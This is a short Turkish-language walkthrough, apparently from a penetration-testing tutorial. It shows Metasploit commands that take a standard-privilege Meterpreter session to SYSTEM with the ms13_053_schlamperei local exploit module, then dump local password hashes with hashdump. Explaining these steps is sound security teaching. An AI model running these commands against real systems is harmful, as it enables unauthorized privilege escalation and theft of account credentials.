Standart yetkilerle elde edilen Meterpreter bağlantısında yerel parola özetlerinin elde edilemediği görülmektedir. Bu yetkilere sahip durumda iken, hak yükseltmek için kullanılacak olan MSF ms13_053_schlamperei istismar modülü seçilir.
getuid
run hashdump
search ntuser
use exploit/windows/local/ms13_053_schlamperei
show options
Modüle, mevcut oturuma ait ID değeri verilir ve modül başlatılarak SYSTEM hakları elde edilir.
set SESSION 1
show options
run
getuid
Modülün SYSTEM hakları ile çalışan “notepad.exe” ve sonrasında da “winlogon.exe” adlı iki proses oluşturduğu görülmektedir. Hak yükseltme işlemi sonrasında, yerel hesaplara ait bilgilerin elde edilebildiği görülmektedir.
getuid
getpid
ps -S notepad
run hashdump